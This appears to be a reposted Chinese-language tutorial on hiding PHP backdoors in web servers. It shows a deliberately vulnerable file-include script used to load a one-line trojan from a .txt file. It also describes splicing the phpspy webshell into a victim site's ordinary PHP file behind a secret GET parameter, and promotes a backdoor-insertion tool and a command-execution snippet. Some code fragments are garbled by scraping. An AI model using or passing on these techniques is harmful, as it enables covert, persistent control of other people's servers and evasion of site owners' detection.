Home  >  Article  >  php教程  >  PHP后门隐藏

PHP后门隐藏

WBOY
WBOYOriginal
2016-06-06 20:09:46862browse

首先建立一PHP文件test.php 文件内容为: ?php $test=$_GETtest; @include test/.$test; ? Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://loca

首先建立一PHP文件test.php 文件内容为:
  


  $test=$_GET['test'];

  @include 'test/'.$test;

  ?>   


  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。   

方法2现在的webshell是越来越流行了,连php的后门也追上来了,主要的有angel的phpspy和 lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦)但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢?没有想过吗?呵呵,跟我来,我们用记事本打开phspy就好了,搜索登录入口四个字。 在


function loginpage() { ?>
后面加上

if ($ _ GET[name] == wrsky) { ?>
再在

前面面加上

} ?>


现在你可以把这一个phpspy都写到对方的某个正常的php文件里,直接浏览是看不出问题的喔,我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的,只要替代上面 代码里的name和wrsky就可以的,相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话,这里就有样东西要介绍给你哦~php后门插入器,呵呵,你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔,粉PP吧~~我们来测试一下,我在这里提供一段 代码


执行CMD命令

想执行的命令: > 系统命令>


这段 代码是执行cmd命令的,我们利用插入 工具 进行插入看看! 没插入前的样子我的设置为参数名为name,参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了,你也可以写成 /home/imaboy/bk.php(因为这是 linux 系统) 显示写入文件成功,我们开始连接咱的木马,以为我用的参数的name,值是wrsky,所以连接方式为 木马 所在地址?name=wrsky 大家可以看到,在输入后面的参数后运行完全正常,而且不易被发现喔,很可能被带到另外一台主机上去喔 。 ,
呵呵,只要想一点,你们肯定还会有更好的办法的!
Tags - php , 后门
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn